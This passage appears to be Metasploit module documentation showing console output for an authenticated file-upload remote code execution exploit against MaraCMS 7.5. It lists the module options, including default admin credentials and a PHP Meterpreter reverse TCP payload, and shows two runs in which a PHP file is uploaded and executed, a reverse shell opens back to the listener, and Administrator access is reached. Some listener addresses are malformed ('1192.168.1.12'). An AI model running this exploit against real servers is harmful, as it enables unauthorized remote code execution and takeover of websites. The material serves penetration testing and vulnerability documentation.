msf5 exploit(multi/http/maracms_upload_exec) > show options

Module options (exploit/multi/http/maracms_upload_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   changeme         yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.20     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to MaraCMS
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  1192.168.1.12    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP


msf5 exploit(multi/http/maracms_upload_exec) > run

[*] Started reverse TCP handler on 192.168.1.12 :4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is most likely MaraCMS with version 7.5 or lower
[*] Obtained salt `9781` from server. Using salt to authenticate...
[+] Successfully authenticated to MaraCMS
[*] Uploading payload as zKEdBPw5j.php...
[+] Successfully uploaded zKEdBPw5j.php
[*] Executing the payload...
[*] Sending stage (38288 bytes) to 192.168.1.20 
[*] Meterpreter session 15 opened (192.168.1.12 :4444 -> 192.168.1.20 :49324) at 2020-09-22 15:30:14 -0400

meterpreter > 
[!] Deleting: zKEdBPw5j.php
[+] zKEdBPw5j.php removed
getuid
Server username: Administrator (0)
meterpreter >
```
### MaraCMS 7.5 running on Windows Server 2012 (XAMPP server) - Windows target
```
msf5 exploit(multi/http/maracms_upload_exec) > run

[*] Started reverse TCP handler on 1192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is most likely MaraCMS with version 7.5 or lower
[*] Obtained salt `6521` from server. Using salt to authenticate...
[+] Successfully authenticated to MaraCMS
[*] Uploading payload as gCUII0Fx41Q.php...
[+] Successfully uploaded gCUII0Fx41Q.php
[*] Executing the payload via a series of HTTP GET requests to `/gCUII0Fx41Q.php?1xFqv=<command>`
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (201283 bytes) to 192.168.1.20
[*] Meterpreter session 14 opened (1192.168.1.12:4444 -> 192.168.1.20:49323) at 2020-09-22 15:30:05 -0400
[*] Command Stager progress - 100.00% done (12025/12025 bytes)

meterpreter > 
[!] Deleting: gCUII0Fx41Q.php
[+] gCUII0Fx41Q.php removed
getuid
Server username: WIN-S417DG9MRTR\Administrator
meterpreter >
```